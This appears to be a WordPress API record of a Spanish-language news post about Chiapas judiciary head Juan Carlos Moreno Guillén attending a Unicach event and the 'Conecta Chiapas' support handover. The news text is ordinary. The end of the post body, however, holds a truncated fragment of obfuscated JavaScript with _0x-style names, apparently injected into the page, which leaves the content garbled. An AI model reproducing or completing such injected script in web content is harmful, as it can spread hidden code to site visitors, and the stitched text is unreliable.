{"id":21065,"date":"2025-03-26T02:56:45","date_gmt":"2025-03-26T02:56:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21065"},"modified":"2025-03-26T02:56:45","modified_gmt":"2025-03-26T02:56:45","slug":"asiste-moreno-guillen-a-la-entrega-de-apoyos-del-programa-conecta-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21065","title":{"rendered":"Asiste Moreno Guill\u00e9n a la Entrega de Apoyos del Programa \u201cConecta Chiapas\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-1024x683.jpg\" alt=\"\" class=\"wp-image-21066\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250325-WA0055-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>25 de Marzo del 2025. El magistrado presidente del Poder Judicial de Chiapas, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al titular del Ejecutivo Estatal, Eduardo Ram\u00edrez Aguilar, junto al secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez y a la rectora de la Universidad de Ciencias y Artes de Chiapas (Unicach), Fanny L\u00f3pez Jim\u00e9nez; a la ceremonia de Inauguraci\u00f3n del Centro Multidisciplinario de la Universidad de Ciencias y Artes de Chiapas, as\u00ed como a la Entrega de Apoyos del Programa \u201cConecta Chiapas\u201d, en el teatro universitario de esta instituci\u00f3n.<\/p>\n\n\n\n<p>Durante el evento, el magistrado presidente afirm\u00f3 que este programa representa un verdadero acceso al servicio como un derecho humano fundamental, mismo que contribuye a reducir la brecha digital en nuestra entidad, destac\u00f3 que el fortalecimiento integral de la educaci\u00f3n, es uno de los temas prioritarios que garantizan que las futuras generaciones de Chiapas, establezcan las bases para una sociedad en paz y con justicia social.<\/p>\n\n\n\n<p>Acudieron tambi\u00e9n a este evento, el director general del Inifech, Carlos Idelfonso Jim\u00e9nez Trujillo; el presidente de la LXIX Legislatura del Congreso del Estado, Luis Ignacio Avenda\u00f1o Berm\u00fadez y el presidente municipal de Tuxtla, \u00c1ngel Torres Culebro.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 25 de Marzo del 2025. El magistrado presidente del Poder Judicial de Chiapas, Juan Carlos Moreno Guill\u00e9n, acompa\u00f1\u00f3 al titular del Ejecutivo Estatal, Eduardo Ram\u00edrez Aguilar, junto al secretario del Humanismo, Francisco Chac\u00f3n S\u00e1nchez y a la rectora de la Universidad de Ciencias y Artes de Chiapas (Unicach), Fanny L\u00f3pez Jim\u00e9nez; a la ceremonia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21066,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21065","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21065","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21065"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21065\/revisions"}],"predecessor-version":[{"id":21067,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21065\/revisions\/21067"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21066"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21065"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21065"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21065"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}